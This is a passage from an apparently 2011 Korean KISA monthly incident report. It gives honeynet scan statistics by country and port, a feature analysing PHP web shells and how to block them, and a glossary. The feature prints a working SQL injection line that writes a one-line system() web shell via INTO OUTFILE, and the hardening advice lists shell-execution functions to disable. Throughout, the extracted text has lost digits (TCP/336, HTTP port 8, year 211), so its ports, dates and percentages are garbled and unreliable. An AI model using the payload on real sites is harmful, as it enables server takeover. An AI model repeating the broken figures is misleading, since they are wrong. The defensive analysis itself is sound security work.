26 24 인터넷침해사고동향및분석월보 _ 침해사고위협분석 Top 3 국가별공격유형 해외로부터 KISC 허니넷에유입된트래픽을근원지 IP소재국가별로분석한결과중국으로부터유입된트래픽이 54.6% 로가장많았으며다음으로미국 (19.6%), 대만 (5.3%) 순이었다. 중국으로부터의트래픽은 TCP/1433, TCP/336 포트에대한서비스스캔이가장많은비중을차지한것으로나타났다. China Taiwan U.S.A [ 그림 33] 허니넷유입트래픽 Top3 국가별공격유형 18.8% 24.5% 27.9% 24.5% 6.2% 6.3% 11.8% 56.9% 42.6% 7.6% 1.9% 14.4% 1.6% 15.2% 21.8% < 중국 China> TCP/ tcp service scan TCP/336 - tcp service scan TCP/ tcp service scan TCP/22 - tcp service scan 기타 < 미국 U.S.A> TCP/336 - tcp service scan TCP/8 - tcp service scan Ping Sweep TCP/445 - tcp service scan 기타 < 대만 Taiwan> TCP/445 - tcp service scan TCP/139 - tcp service scan TCP/135 - tcp service scan TCP/25 - tcp service scan 기타

27 25 인터넷침해사고동향및분석월보 _ 침해사고위협분석 [ 표 2] 최근 6 개월간허니넷에유입된유해트래픽국가별비율 211 년 순위 2 월 3 월 4 월 5 월 6 월 7 월 국가명중국미국싱가포르태국러시아네덜란드대만캐나다핀란드인도기타 비율 67.4% 7.6% 6.5% 3.9% 2.9% 2.7% 2.4% 1.5% 1.1%.8% 3.2% 국가명 비율 국가명 비율 국가명 비율 국가명 비율 국가명 비율 중국 57.2% 중국 37.9% 중국 54.4% 중국 57.7% 중국 54.6% 미국 2.1% 미국 2.4% 미국 19.% 미국 21.7% 미국 19.6% 대만 4.5% 대만 3.1% 대만 4.9% 일본 2.8% 대만 5.3% 일본 2.3% 브라질 2.6% 일본 1.9% 대만 2.7% 홍콩 4.6% 러시아 2.1% 일본 2.% 인도 1.8% 홍콩 2.6% 싱가포르 2.1% 덴마크 1.8% 독일 1.% 터키 1.6% 터키 1.3% 일본 2.% 폴란드 1.6% 러시아 1.% 독일 1.2% 인도 1.2% 러시아 1.7% 인도 1.6% 인도.9% 홍콩.9% 브라질 1.1% 브라질 1.6% 영국 1.4% 터키.9% 러시아.8% 독일.9% 터키 1.6% 터키 1.3% 홍콩.9% 브라질.8% 캐나다.9% 필리핀 1.3% 기타 6.1% 기타 3.2% 기타 12.7% 기타 7.1% 기타 5.6% [ 그림 34] 허니넷에유입된국가별유해트래픽추이 중국 미국 대만 일본 홍콩 8% 7% 6% 5% 4% 3% 2% 1% % 2월 3월 4월 5월 6월 7월

28 26 인터넷침해사고동향및분석월보 _ 침해사고위협분석 해외 국내 해외로부터 KISC 허니넷에유입된트래픽을국가구분없이포트 / 공격 ( 스캔 ) 유형별로분석한결과, TCP/1433 포트에대한서비스스캔이 34.8% 로가장많았으며, TCP/336, TCP/445 포트에대한서비스스캔등의순으로나타났다. [ 표 21] 최근 6개월간해외 국내 ( 허니넷 ) 공격유형탐지현황 211년 2월 211년 3월 211년 4월 211년 5월 211년 6월 211년 7월 순위프로토콜 / 프로토콜 / 프로토콜 / 프로토콜 / 프로토콜 / 프로토콜 / 비율비율비율비율비율포트번호포트번호포트번호포트번호포트번호포트번호 비율 1 TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % 2 TCP/22 13.% TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % 3 TCP/ % TCP/ % TCP/ % TCP/ % TCP/8 8.% TCP/ % 4 TCP/ % ICMP 7.3% ICMP 1.2% TCP/ % TCP/ % TCP/22 6.4% 5 TCP/ % TCP/135 6.% TCP/22 9.3% TCP/22 8.3% TCP/22 5.4% TCP/ % 6 UDP/ % TCP/336 5.% TCP/ % ICMP 5.9% ICMP 4.3% TCP/8 4.5% 7 TCP/ % TCP/ % TCP/ % TCP/ % TCP/135 4.% ICMP 4.5% 8 TCP/8 4.5% TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % 9 TCP/25 4.2% ICMP 2.7% TCP/ % TCP/ % TCP/ % TCP/ % 1 TCP/ % TCP/ % TCP/ % TCP/8 3.7% TCP/ % TCP/ % 기타 8.7% 기타 14.5% 기타 14.9% 기타 18.4% 기타 12.7% 기타 16.9% 6개월간해외에서국내에유입된공격유형별추이를분석한결과, TCP/1433 포트에대한서비스스캔은감소한반면, TCP/336, TCP/445, TCP/22 포트에대한서비스스캔은소폭증가한것으로나타났다. [ 그림 35] 해외 국내 ( 허니넷 ) 공격유형추이및비율 4% 3% 2% 4.5% 34.8% 1% 2 월 3 월 4 월 5 월 6 월 7 월 6.4% 9.1% 9.2% TCP/ tcp service scan TCP/22 - tcp service scan TCP/336 - tcp service scan TCP/139 - tcp service scan TCP/445 - tcp service scan TCP/ tcp service scan TCP/336 - tcp service scan TCP/445 - tcp service scan TCP/22 - tcp service scan 기타 - MS-SQL(TCP/1433), MySQL(TCP/336) 포트에대한서비스스캔이많이발생하고있으므로 MS-SQL, MySQL 서비스를운영하는서버관리자는해당서비스의보안업데이트적용등보안조치가필요함

29 27 인터넷침해사고동향및분석월보 _ 침해사고위협분석 국내 국내 국내에서 KISC 허니넷에유입된트래픽을포트 / 공격 ( 스캔 ) 유형별로분석한결과, TCP/1433 포트에대한서비스스캔이 12.9% 로가장많았으며그외 TCP/336, TCP/139 포트에대한서비스스캔순으로나타났다. [ 표 22] 최근 6개월간국내 국내 ( 허니넷 ) 공격유형탐지현황 211년 2월 211년 3월 211년 4월 211년 5월 211년 6월 211년 7월 순위프로토콜 / 프로토콜 / 프로토콜 / 비율비율포트번호포트번호포트번호비율프로토콜 / 포트번호비율프로토콜 / 포트번호비율프로토콜 / 포트번호비율 1 TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % 2 TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % 3 TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % TCP/ % 4 UDP/53 1.6% TCP/ % TCP/ % TCP/ % TCP/135 7.% TCP/ % 5 TCP/ % ICMP 5.4% TCP/ % TCP/ % TCP/ % TCP/ % 6 TCP/ % TCP/ % ICMP 4.% TCP/ % TCP/139 4.% TCP/ % 7 TCP/88 5.2% TCP/22 4.5% TCP/22 2.9% TCP/22 2.9% TCP/ % ICMP 3.3% 8 TCP/8 3.1% TCP/ % TCP/ % ICMP 2.8% ICMP 2.8% TCP/22 2.9% 9 TCP/ % TCP/88 2.% TCP/59 1.4% TCP/ % TCP/22 2.5% TCP/ % 1 TCP/8 1.1% TCP/59 1.4% TCP/ % TCP/59 1.1% TCP/8 2.3% TCP/88 1.1% 기타 6.1% 기타 1.9% 기타 9.9% 기타 5.9% 기타 7.8% 기타 43.5% 6개월간국내에서발생한공격유형별추이를분석한결과, 다양한포트에대한스캔이증가하여 TCP/1433, TCP/336 등의포트에대한서비스스캔의비율이감소한것으로나타났다. [ 그림 36] 국내 국내 ( 허니넷 ) 공격유형추이및비율 45% 4% 35% 3% 25% 2% 15% 1% 5% 2월 3월 4월 5월 6월 7월 62.9% 12.9% 12.5% 6.4% 5.3% TCP/ tcp service scan TCP/ tcp service scan TCP/135 - tcp service scan TCP/336 - tcp service scan TCP/445 - SMB service scan TCP/ tcp service scan TCP/336 - tcp service scan TCP/ SMB service scan TCP/445 - tcp service scan 기타

30 28 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 1. 개요 공격자들은자신의목적을달성하기위해다양한경로와방법으로공격을시도하지만, 최근침해사고는웹서버를공격목표로하는경우가많이발생하고있다. 웹서버는대중에공개되어야하는특성상상대적으로보안장비의보호를받지못한채외부에노출되어있기때문에주요공격목표가될수밖에없는데, 이러한웹서버를공격하고제어하는데활용되는대표적인도구로 웹쉘 을들수있다. 본문서에서는최근발견된웹쉘의분석사례를통해동작원리및기능을살펴보고, 안전하게웹서버를운영하기위한대응방안등을살펴보고자한다. 가. 웹쉘 (WebShell) 이란? WebShell 이라는어원을생각해보면 Shell은일반적으로리눅스 / 유닉스환경에서서버의명령어를실행하기위한명령어입력창 ( 해석기 ) 이며, Web은웹페이지의약어를의미한다. 단어의의미를조합해보면, 웹쉘 (Web- Shell) 은웹서버에게명령어를실행할수있도록입력창을웹페이지로제공하는도구를가리킨다. 다양한웹개발언어는웹서버를제어할수있는다양한 Function, Object, Method를제공하고있으며, 이런것을통해웹쉘을제작할수있다. 즉, 웹쉘은웹언어에서제공하는정상적인서버제어기능을악용할목적으로개발된 Server Side Script 라고할수있으며, 일반적으로 PHP, JSP, ASP, CGI( 보통 Perl) 로개발된다. 나. 웹쉘의위험성 1 방화벽통과공격자는웹쉘을공격대상웹서버에업로드한후원격에서 HTTP(TCP/8) 포트로해당서버를제어하기위한시스템명령어를수행하므로기존의 L4 네트워크방화벽으로차단이어렵다. 또한웹방화벽으로웹쉘제어자체를차단하려고하더라도해당방어정책은주로일회성이여서매번웹쉘기능마다특성에맞는정책을추가한다는것은거의불가능하다. 2 백신탐지우회웹쉘을탐지하기위해기존서버용백신으로는신속한탐지를기대하기어렵다. 실제로 11년 7월에수집된 PHP 웹쉘을 사이트에서각바이러스백신엔진탐지결과 43개중 1개의엔진만이탐지하는것으로확인되었다.

31 29 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 : 43 개국내 외백신엔진제공으로악성코드샘플진단여부확인가능사이트 [ 그림 1] 수집된 PHP 웹쉘의백신엔진별진단결과 수집된웹셀은압축및인코딩되어있었으며, 압축해제및디코딩후다시점검하면 43 개중 12 개 (27.9%) 백신에서탐지 공격자들은웹쉘을빈번히변경시켜사용하고난독화기법을사용하여탐지를어렵게하고있어신속히대응하기가쉽지않다. 또한, 위에서서술한것처럼정상적인웹언어에서제공하는다양한 Function을사용하기때문에오탐률이높을수있어, 백신처럼악성코드로탐지되는것들을실시간에서자동으로격리하거나삭제하는것은서비스장애유발가능성때문에환경설정에유의해야하는어려움이있다. 이처럼백신프로그램으로웹쉘탐지가어려워일반적인서버관리자들이대응하기쉽지않으며, 피해를인지하더라고웹사이트복원을위해웹쉘이올려져있던기존의웹사이트백업파일을그대로사용하기때문에피해가반복되기쉽다.

32 3 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 3 파급효과확대웹쉘이업로드되어실행될경우피해에대한파급효과가크게나타날수있다. 이는웹언어에서일반적으로파일및디렉터리조작, 파일업로드및다운로드, 레지스트리조작, 포트스캔, 시스템명령어실행, 익스플로잇실행, 데이터베이스접속및실행등다양한기능을제공하고있기때문이다. 이런기능들을이용하여웹서버는공격자에의해완전히장악되며, 환경에따라서는웹서버와연결된서버들도공격자에의해피해를입을수있다. 4 웹쉘입수및사용용이성웹쉘은인터넷을통해손쉽게구할수있으며, 다양한업로드방법이있지만게시판의파일업로드기능을이용하는경우쉽게업로드할수있다. 이후업로드된경로와해당파일에대한 URL을주소를입력하면웹쉘이실행된다. 하지만최근에는업로드파일확장자필터링, 실행권한제거, PHP 환경설정, 업로드경로노출차단등웹서버의보안을강화하면서웹쉘삽입및실행이점차어려워지고있다. 다. 최근웹쉘동향 7년 ~ 8년에는 ASP용웹쉘이많이등장했지만최근에는 PHP용웹쉘이더많이발견되고있다. ASP의경우기존에알려진피해사례를통해웹쉘에대한조치가많이이뤄졌고대부분휘슬로탐지가가능하기때문에신규웹쉘로탐지되는경우가드문반면, PHP는손쉬운환경구축, 무료배포, 지속적인버전업데이트, 다양한웹패키지, 오픈소스등을장점으로중 소기업뿐만아니라개인용홈페이지에도최근들어많이개발되고있기때문으로판단된다. 실제로 KISA에서제공하는영세기업대상무료원격홈페이지취약점점검서비스현황을보면, 점검사이트중취약점이발견된 URL이 9년에는 ASP가 75% 로대부분을차지했지만, 1년에는 PHP가 35% 를차지해 PHP 사이트가점차늘어나는추세이다. 최근에는관리자가확인하기어렵고백신탐지우회를목적으로난독화하여개발되고있다. 예전에는 base64_ encode 만을주로사용하였다면, 최근에는 PHP에서제공하는 Zlib Function을이용해압축기능을사용하여난독화하고있어최근에는 PHP 웹쉘도예전 ASP 웹쉘처럼공격자만이사용할수있도록패스워드를구현해놓은형태가많이발견되고있다. 키길이와형태를보면패스워드는 MD5로해쉬되어있음을추측해볼수있고간단하게 Plain Text를조합해본결과어렵지않게암호를확인할수있다. [ 그림 2] 웹쉘패스워드입력창및구현함수

33 31 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 오류없는다양한기능을탑재한웹쉘과각기능별로분리된웹쉘등다양한형태로등장하고있어탐지패턴을생성하기가더욱어려워지고있다. 각기능별로는파일업로드, 파일수정, passthru, exec, system 등을이용한시스템명령어실행기능등을담고있다. 최근에는 PHP의경우 SafeMode 옵션을통해 Function 제한설정, 디렉터리접근제한등을설정할수있어서웹쉘에서해당환경의 SafeMode가 On Off인지, 실행할수있는 Function이무엇인지체크하는로직이포함되어있다. SafeMode : PHP에서보안기능을설정할수있는옵션이나, 해당기능의버그로인한이용자불만으로 PHP 5.4. 부터는삭제예정 [ 그림 3] Safe_mode 확인및환경설정 2. PHP 웹쉘분석사례 국내에서리눅스, 윈도우환경의웹서버에서 PHP 웹쉘이발견되고있다. 운영되는홈페이지에 SQL Injection, 파일업로드등취약점이존재한다면, 웹쉘삽입이가능하고삽입한웹쉘로다양한공격을수행할수있다. 최근공격으로이용된 PHP 웹쉘의상세분석을통해웹쉘을홈페이지에삽입하는방법과웹쉘의기능등을상세히살펴보도록하겠다. SQL Injection 관련상세내용은웹보안서비스 ( 사이트에서동영상으로제공 가. 웹쉘동작원리공격자는외부에서접근가능한웹사이트게시판의업로드기능이나웹취약점을이용하여웹쉘을업로드한다. 업로드된웹쉘은해당웹서버에저장되고공격자는외부에서브라우저를통해해당웹쉘파일에접근한다. 일반적으로웹서비스를위해서 HTTP 8포트는열어놓고있기때문에제한없이접근이가능하다. 접근후웹쉘기능에따라다양한정보를탈취할수있다.

34 32 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 외부 내부 게시판 웹쉘저장 웹쉘저장 웹취약점악용하여삽입 HTTP 8 포트 직접 URL 접근웹쉘실행 악성 URL 삽입중요정보탈취홈페이지변조 L4 방화벽 [ 그림 4] 웹쉘삽입및동작개요도 나. 웹쉘삽입방법 1 SQL Injection 을통한웹쉘생성 MySQL에서제공하는 Select문의 outfile 옵션을통해서버에파일쓰기를할수있다. 이는 Select문의 select column값을 Outfile로원하는 text 파일, 확장자로저장할수있게한다. SQL Injection 취약점이존재하게되면, UNION문을통해다중 SQL 문을실행할수있는데, select문을추가적으로실행하여웹쉘을생성할수있다. 이외에도데이터베이스테이블에웹쉘코드를저장하고 Dumpfile을사용하여로컬파일로저장이가능하다. 이들중 Select문의 Outfile을통한공격예제를확인해보도록하겠다. MySQL 에서파일을생성하는 SQL 문 - select text INTO OUTFILE file.txt [ 그림 5] select 문을통한웹쉘생성

35 33 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 기존의 SQL 문에 UNION 을사용하여, 추가적인 SQL 문실행가능 - select mb_id, mb_password from rg_member where mb_id= admin and mb_password= password union select text,2 into outfile /file.txt [ 그림 6] union 문을통한웹쉘생성 시스템명령어를실행하는간단한코드 - <? system($_request[ cmd ]);?> SQL Injection 공격이가능한곳에아래와같이입력하면웹쉘이생성되고원격에서시스템명령어실행이가능해짐 - select mb_id, mb_password from rg_member where mb_id= admin and mb_password= password union select <? system($_request[ cmd ]);?>,2 into outfile c:/apm_setup/htdocs/ganada/data/board/cmdshell.php [ 그림 7] 웹쉘생성결과및실행

36 34 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 2 파일업로드를통한웹쉘삽입 홈페이지에는흔히게시판에이용자가파일을업로드하도록되어있다. 확장자필터링이적용되지않은 업로드기능을이용해웹쉘을업로드하고명령을실행하는형태이다. 파일업로드 홈페이지에는흔히이용자들이접근할수있는게시판이있고글쓰기기능을제공하는데, 작성페이지에확장자필터링을 적용하지않은파일첨부기능을이용하여웹쉘업로드 [ 그림 8] 게시판을통한웹쉘삽입 웹쉘접근및실행 - 웹쉘파일을업로드한뒤실행을위해서는해당 URL 로직접접근 [ 그림 9] 웹쉘실행화면 - 이외에도 Remote File Include 취약점이나, 내부서버실행 Function 을사용한페이지의입력값체크부재등의취약점을 이용하면서버의시스템명령어사용가능

37 35 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 다. 웹쉘기능분석최근공격에악용된시스템에서입수한웹쉘샘플을바탕으로기능을분석하였다. 이웹쉘의원본은 PHP***211 이었는데, 다양한기능과직관적인 UI를가지고있었다. 입수한웹쉘샘플은원본웹쉘에는없는기능도추가적으로갖고있어공격및판매를목적으로사용되었음을추정할수있다. 해당웹쉘은 KISA 에서보급하는웹쉘탐지도구휘슬 (WHISTL) 로탐지가능함 ( 에서배포 ) 1 파일관리기능파일관리를위해제공되는다양한 Function 을통해웹서버의파일조작이가능해지고, 파일업로드 / 다운로드, 파일수정, 파일생성, 파일명변경등다양한기능을제공한다. [ 그림 1] 파일관리 (File Manager) 화면 특히파일의수정시간 (modified time) 변경기능을통해시간을변조시킴으로써피해시스템분석을어렵게하는요인이될수있다. 예를들어 footer.php의원래최종수정시간 (Last modified) 은 21년 1월이었으나해당기능을이용해 215년 12월로변경할수있었다. [ 그림 11] 파일수정시간변경 소스코드를살펴보면 Filetime(), touch() 를사용하고있었고, 유닉스계열에서파일시간을수정할수있는 strotime() 함수도포함되어있어윈도우환경이든리눅스환경이든상관없이실행되도록개발된것을알수있다. 이기능은원본인 PHP***211에없었던기능으로공격용으로사용하기위해웹쉘이수정되었음을확인할수있다. [ 그림 12] 파일수정기능소스코드일부분

38 36 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 2 압축파일제공여러개의파일을압축하여다운로드받을수있었는데이기능은원본웹쉘인 PHP***211에는없던것으로, 해당기능을구현하기위해여러개의 Function이추가되면서기존보다코드라인도많이늘어났다. 이는웹쉘판매를위해관리기능을추가한것을확인할수있다. [ 그림 13] 파일압축기능 [ 그림 14] 압축실행결과 3 데이터베이스관리기능 MS-SQL, MySQL 에대해제공되는데, 각 DB 데이블를조회할수있고 Export할수있는 DML, DDL을지원한다. PHP 홈페이지운영환경구축을위해 APM 설치버전이배포되고있어윈도우환경에서손쉽게설치가가능해졌는데, 윈도우환경을사용하다보면 MS-SQL 솔루션이설치될수있기때문에추가된기능이다. 이역시수집된웹쉘이판매용임을확인할수있는부분이다. APM : Apache, PHP, MySQL이통합되어있는 Install 파일 [ 그림 15] MySQL 실행화면

39 37 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 MySQL Manager 해당웹쉘에는홈페이지개발할때 MySQL 관리를위해많이이용되는일반적인 Function들 (mysql_connect, mysql_select_db, mysql_get_server_info, mysql_query 등 ) 이사용되었고소스코드곳곳에데이터베이스를조작하기위한코드를포함하고있었음 [ 그림 16] MySQL 실행관련소스코드 MSSQL Manager MySQL 과동일하게일반적인 Function 이사용되고소스코드곳곳에데이터베이스를조작하기위한코드가포함되어있어, 이런내용으로웹쉘탐지패턴을만드는것은오탐율이높아질수있으므로정교한패턴개발이필요하다. 4 PHP 코드원격실행웹쉘을통해 PHP 소스파일을원격에서바로실행할수있는데, 해당웹쉘은 Plugin을통해레지스트리읽기, 쓰기, 삭제, Serve-u Exploit, MySQL을이용한악성코드생성등의기능을제공하고있다. [ 그림 17] 악성코드실행을위한레지스트리등록

40 38 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 [ 그림 18] MySQL 을이용한악성코드생성 5 기타기능서버의로컬명령어와프로그램을실행하는기능을제공한다. 그러나원격에서접속하여실행하는것이기때문에, 프로그램을실행하기위해 PHP의 COM Class를통해외부오브젝트를사용할수있는데, MS에서제공하는 Shell.Application 오브젝트가이용되었으며, 명령어실행을위해사용된 Wscirpt. Shell 오브젝트는 ASP용웹쉘에서명령어실행을위해사용되는것들이다. [ 그림 19] 명령어실행 또한명령어실행을위해사용한 Proc_open, system, passthru, shell_exec Function들도웹쉘에서흔히사용하는 Function들이다. [ 그림 2] 명령어실행관련소스코드

41 39 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 라. 스크립트난독화이전부터, 웹쉘은관리자가스크립트내용을확인하기어렵게하거나백신탐지를우회할목적으로사용되어왔다. PHP 웹쉘의경우도예외는아니다. 수집된웹쉘의경우 base64_encode, gzinflate function 을사용하고있다. base64_decode/encode 는전송하는바이너리파일이나인코딩문자열들의호환성을위해서사용한다. gzdeflate/inflate는전송하려는데이터의양을줄이기위해사용한다. 이외에도 PHP는 gzcompress도제공한다. [ 그림 21] 인코딩소스와디코딩소스 마. PHP 짧은웹쉘 시스템명령어만을실행할수있도록개발된소스코드 1줄짜리의웹쉘, Xterm을이용한 reverse-connection 을시도하는웹쉘등도발견되고있다. [ 그림 22] PHP 짧은웹쉘사례

42 4 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 3. 대응방안 지금까지분석사례를바탕으로웹쉘의동작원리와기능을중심으로살펴보았다. 이러한웹쉘로부터피해를예방하기위한대응방안을알아보도록하겠다. 가. 탐지방법 1 무료웹쉘탐지도구 - 휘슬 (WHISTL) 웹쉘은휘슬을이용하여탐지가가능하다. 휘슬 (WHISTL) 은웹쉘을탐지하기위한프로그램으로, KISA에서무료배포하고있으며, 리눅스, 윈도우환경에서사용이가능하다. 또한악성URL 탐지기능도포함되어홈페이지운영자및관리자들이보다신속히대응할수있도록지원하고있다. 현재 KISA에서는지속적으로악성URL과웹쉘샘플을수집하여패턴을개발및등록하고있다. 악성URL : 악성코드경유지및유포지로악용하기위해삽입된 URL 휘슬 (WHISTL) : 웹보안서비스사이트 ( 를통해배포 < 휘슬사용안내 > Standalone 형태로압축을풀어간단한환경설정후바로사용이가능 ( 백신과같이동작하므로큰어려움없이사용이가능 ) 웹보안서비스사이트 ( 에서설치및사용방법을동영상으로제공 웹보안강화도구의이해와활용 ( 참조 관리목적을위해개발된사이트들은시스템명령어를사용할확률이높기때문에, 폴더를따로두어점검하는것이불필요한오탐을줄일수있음 패턴매칭이많이이루어진것은웹쉘일확률이높기때문에, 적게이루어진것을중심으로웹쉘여부를확인하는것이효율적 2 백신및웹쉘탐지솔루션사용각백신들의서버용제품들도웹쉘탐지가가능하고최근시장에는웹쉘탐지를위한상용제품들이출시되어있다. 상용제품은휘슬에비해대형서버환경에적합한서버 / 클라이언트로구성되어있고관리기능이추가되어있다.

43 41 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 나. 공격차단방법 1 업로드폴더에 PHP 접근차단파일업로드필터링은두가지방법으로설정할수있는데, 화이트리스트방식과블랙리스트방식으로가능하다. 화이트리스트는허용가능한입력값에대한리스트이고, 블랙리스트는허용되지않는입력값에대한리스트이다. Apache 에서는 httpd.conf 설정파일을이용하여확장자별접근제어를할수있다. gif, jpg, png 파일이외의접근은허용되지않으며, 이외의파일이접근하게되면접근에러메시지인 error.html 내용을보여주게한다. <Directory /home/apache/htdocs/www/data/upload> Order deny,allow Deny from all <FilesMatch \.(gif jpe?g png)$ > Order deny,allow Allow from all </FilesMatch> ErrorDocument 43 /error.html </Directory> 디폴트설치시 httpd.conf 파일위치 - 윈도우계열 : c:/program files/apache group/apache/conf - 유닉스계열 : /etc/httpd/conf/ 또한,.htaccess 파일을이용하여해당폴더의접근을제한할수있으며, Server Side Script 확장자를 text/html로 MIME type을조정하여, 스크립트가아닌텍스트문서로취급하도록설정할수있다..htaccess 파일을활성화하기위해서는 AllowOverride none이아닌지확인해야한다. AllowOverride : 접근제한을실행할수있는기능을제공한다. <FilesMatch \.(gif jpe?g png)$ > Order allow,deny Deny from all </FilesMatch> AddType text/html.html.htm.php.php3.htaccess 파일위치 : 접근제한이필요한폴더에 htaccess 파일을생성

44 42 인터넷침해사고동향및분석월보 월간특집 _ PHP 웹쉘분석및대응방안 2 업로드게시판소스에서파일의확장자제한 확장자필터링을 Client-Side 에서수행한다면, 쉽게우회할수있으므로반드시 Server Side Script 에서 검사해야하며, 다음과같이정규식을이용한확장자체크를할수있다. if (preg_match( /^.*\.(php php3)$/i, $_FILES[ file ][ name ])) exit; 3 PHP Function 및환경변수제한 php.ini 환경설정을통해명령어를실행하거나파일을조작하는함수를아래와같이비활성화할수 있으며, 외부 PHP 파일을삽입할수있는환경변수를변경할수있다. - disable_functions = passthru, shell_exec, exec, system, eval, proc_open, touch - allow_url_fopen = off - register_global = off - magic_quotes_gpc = on 디폴트설치시 php.ini 파일위치 - 윈도우계열 : c:/windows/, 유닉스계열 : /etc/ 4 웹서비스계정에대한권한제한리눅스혹은윈도우즈에서운영되는웹서비스의실행계정으로업로드파일이저장되는폴더의실행권한을제거한다. 웹서비스운영시계정을따로생성하여운영하는것이권한을관리하기쉽다. 5 업로드파일을읽을때는폼을이용하고파일저장장소는개별운영업로드된파일의접근은폼을이용하여해당파일을호출하는방식으로개발함으로써, 웹쉘이저장된경로를숨기고저장되는파일은네트워크스토리지서버 (NAS) 서버를따로두어웹쉘을실행하기위해업로드된파일로 URL을직접입력하여접근할수없도록한다. 6 업로드된파일은사용자가알수없는이름으로변경하여저장하고, 변경된이름정보는서버담당자만알수있도록 DB 등에별도로저장한것이좋다. 7 공개웹방화벽 - 캐슬 (CASTLE) 활용 KISA에서무료로배포하고있는캐슬은서버설치형이아닌웹페이지에설치형이기때문에, 웹호스팅처럼 Virtual Host로운영되는환경에서운영하기용이하다. 웹방화벽사용을사용하면, SQL Injection, 파일업로드등과같은웹취약점을방어할수있어, 웹쉘을삽입하는것을어렵게만든다. 캐슬 (CASTLE) 관련자세한사항도웹보안서비스사이트 ( 에서확인할수있다.

45 43 인터넷침해사고동향및분석월보 용어정리 용어정리 구성설정오류공격 바이러스 (Virus) 바이러스월 (Virus Wall) 버퍼오버플로우 (Buffer Overflow) 봇 (Bot) 분산서비스거부공격 (DDoS:Distributed DoS) 불법자원사용 불법침입 서비스거부공격 (DoS:Denial of Service) 스파이웨어 (Spyware) 스팸릴레이 (Spam Relay) 허니넷 악성프로그램 악성프로그램공격 애드웨어 (Adware) 웜 (Worm) 운영체제및응용프로그램의설정오류 ( 위험성이있는기본설정의사용, 사용자편의를위한설정조정등 ) 를이용하는해킹기법으로홈페이지위 변조, 불법침입등에주로이용됨컴퓨터프로그램이나메모리에자신또는자신의변형을복사해넣는악의적인명령어들로조합하여불특정다수에게피해를주기위한목적으로제작된모든컴퓨터프로그램또는실행가능한코드네트워크환경내부에인-라인 (In-line) 상태에서 LAN 세그먼트의트래픽을관리하여트래픽상의네트워크바이러스를예방및차단하는시스템메모리에할당된버퍼의크기보다더큰데이터를덮어씀으로써호출프로그램으로의복귀오류등을일으켜정상적인프로그램의실행을방해하는대표적인공격기법운영체제취약점, 비밀번호의취약성, 악성코드의백도어등을이용하여전파되며, 해킹명령전달사이트와의백도어연결등을통하여스팸메일전송이나 DDoS 공격에악용이가능한프로그램또는실행가능한코드 DoS용에이전트를여러개의시스템에설치하고, 이에이전트를제어하여 DoS 공격을함으로써보다강력한공격을시도할수있으며, 공격자에대한추적및공격트래픽의차단을어렵게만드는공격형태정당한권한없이특정시스템을스팸릴레이, 피싱사이트개설등에이용하는행위주요정보 자료를수집또는유출하기위하여정당한권한없이시스템에침입하는행위특정네트워크에서허용하는대역폭을모두소모시키거나, 공격대상 (victim) 시스템의자원 (CPU, 메모리등 ) 을고갈시키거나, 시스템상에서동작하는응용프로그램의오류에대한공격으로서비스를못하도록만드는공격이용자의동의없이정보통신기기에설치되어정보통신시스템, 데이터또는프로그램등을훼손 멸실 변경 위조하거나정상프로그램운용을방해하는기능을수행하는악성프로그램. 즉, 이용자의동의없이, 웹브라우저의홈페이지설정이나검색설정을변경, 정상프로그램의운영을방해 중지또는삭제, 컴퓨터키보드입력내용이나화면표시내용을수집 전송하는등의행위를하는프로그램스팸메일발신자추적을어렵게하기위하여타시스템을스팸메일발송에악용 KISA 인터넷침해대응센터내에설치된시험네트워크로스캔정보를비롯한공격행위, 악성코드등을수집사용자의시스템에설치되어백도어를오픈하여정보를유출하거나, 시스템의정상적인동작을방해하는프로그램컴퓨터시스템에악성프로그램을설치하게유도하거나고의로감염시키는해킹기법으로주로백도어등을이용하여상대방의주요정보를빼내기위한목적으로이용함사용자의컴퓨터에광고성팝업창을띄우거나, 초기화면을특정사이트로고정시키는등의사용자가의도하지않는행위를수행하게하는프로그램또는실행가능한코드독립적으로자기복제를실행하여번식하는빠른전파력을가진컴퓨터프로그램또는실행가능한코드

46 44 인터넷침해사고동향및분석월보 용어정리 지역센서취약점정보수집공격침입시도트로이잔 (Trojan) 피싱 (Phishing) 해킹 (Hacking) ASP.NET Botnet DHTML Editing Component ActiveX 관련공격 Hyperlink 개체라이브러리 KrCERT/CC LLS NetBIOS OLE/COM PNG SMB TCP Syn Flooding Windows SharePoint Services Windows Shell 공격징후탐지를위하여 KISA에서주요도시에설치한센서대상시스템의운영체제, 설정등을알아보기위하여스캔하는등의행위로주로해킹의사전단계로이용됨시스템에침입하려고시도하거나, 취약점정보의수집을위해스캔하는등의행위자기복제능력은없으나정상기능의프로그램으로가장하여프로그램내에숨어있는코드조각으로의도하지않은기능을수행하는컴퓨터프로그램또는실행가능한코드정상적인웹서버를해킹하여위장사이트를개설한후, 인터넷이용자들의금융정보등을빼내는신종사기수법으로 Bank Fraud, Scam이라고도함다른사람의컴퓨터나정보시스템에불법침입하거나, 정보시스템의정상적인기능이나데이터에임의적으로간섭하는행위개발자가웹응용프로그램및 XML 웹서비스를구축할수있도록돕는기술로, 정적 HTML과스크립팅을사용하는일반웹페이지와는달리, 이벤트에기반한동적인 HTML 웹페이지를제공함많은 Bot 감염시스템들이명령을수신할목적으로 